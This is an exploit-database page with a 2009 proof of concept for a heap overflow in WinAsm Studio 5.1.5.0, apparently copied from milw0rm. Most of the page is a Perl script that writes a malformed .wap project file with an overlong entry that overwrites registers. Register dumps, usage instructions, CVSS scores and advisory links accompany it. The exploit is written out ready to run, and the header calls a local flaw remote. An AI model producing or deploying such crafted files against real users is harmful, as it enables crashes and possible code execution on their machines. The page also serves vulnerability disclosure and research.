WinAsm Studio 5.1.5.0 Local Heap Overflow PoC

2009.03.24
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# WinAsm Studio 5.1.5.0 Local Heap Overflow Poc # By Mountassif Moad # D0wnload : http://www.winasm.net/index.php?ind=downloads&op=download_file&ide=182&file=WinAsm515Full.zip # Greatz : Simo-Soft - Skd - fl0 fl0w - Str0ke & By By milw0rm :d # # Registers # EAX 00000001 # ECX 00000001 # EDX 0013F814 # EBX 42424242 ( EBX overwrited :d ) # ESP 0013FBDC # EBP 0013FE3C # ESI 0013FBF7 # EDI 0013FD2F ASCII "BBBBBBBBBB" (next chars in EDI :d ) # EIP 0040A927 WinAsm.0040A927 my $m= "\x5B\x46\x49\x4C\x45\x53\x5D\x0D\x31\x3D". "\x41" x 227 . "\x42" x 4 . "\x43" x 20 . "\x0D\x5B\x50\x52". "\x4F\x4A\x45\x43\x54\x5D\x0D\x54\x79\x70\x65\x3D\x0D\x52". "\x65\x6C\x65\x61\x73\x65\x43\x6F\x6D\x6D\x61\x6E\x64\x4C\x69\x6E". "\x65\x3D\x0D\x44\x65\x62\x75\x67\x43\x6F\x6D\x6D\x61\x6E\x64". "\x4C\x69\x6E\x65\x3D\x0D\x41\x75\x74\x6F\x49\x6E\x63\x46\x69". "\x6C\x65\x56\x65\x72\x73\x69\x6F\x6E\x3D\x30\x0D\x52\x43\x53". "\x69\x6C\x65\x6E\x74\x3D\x30\x0D\x50\x65\x6C\x6C\x65\x73\x54". "\x6F\x6F\x6C\x73\x3D\x30\x0D\x5B\x4D\x41\x4B\x45\x5D\x0D". "\x41\x63\x74\x69\x76\x65\x42\x75\x69\x6C\x64\x3D\x30\x0D\x43". "\x6F\x6D\x70\x69\x6C\x65\x52\x43\x3D\x0D\x52\x43\x54\x6F\x4F". "\x62\x6A\x3D\x0D\x41\x73\x73\x65\x6D\x62\x6C\x65\x3D\x2F\x63". "\x0D\x4C\x69\x6E\x6B\x3D\x0D\x4F\x75\x74\x3D\x0D\x44". "\x65\x62\x41\x73\x73\x65\x6D\x62\x6C\x65\x3D\x2F\x63\x0D\x44". "\x65\x62\x4C\x69\x6E\x6B\x3D\x0D\x44\x65\x62\x4F\x75\x74\x3D"; print $m; print "\n"; print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; print " +++ WinAsm Studio 5.1.5.0 Local Heap Overflow Poc +++\n"; print " +++ Written By Stack +++\n"; print " +++ Usage Ex.: perl $0 >>Exploit.wap +++\n"; print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; exit;

References:

http://xforce.iss.net/xforce/xfdb/49266
http://www.securityfocus.com/bid/34132
http://www.milw0rm.com/exploits/8224
http://secunia.com/advisories/34309


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top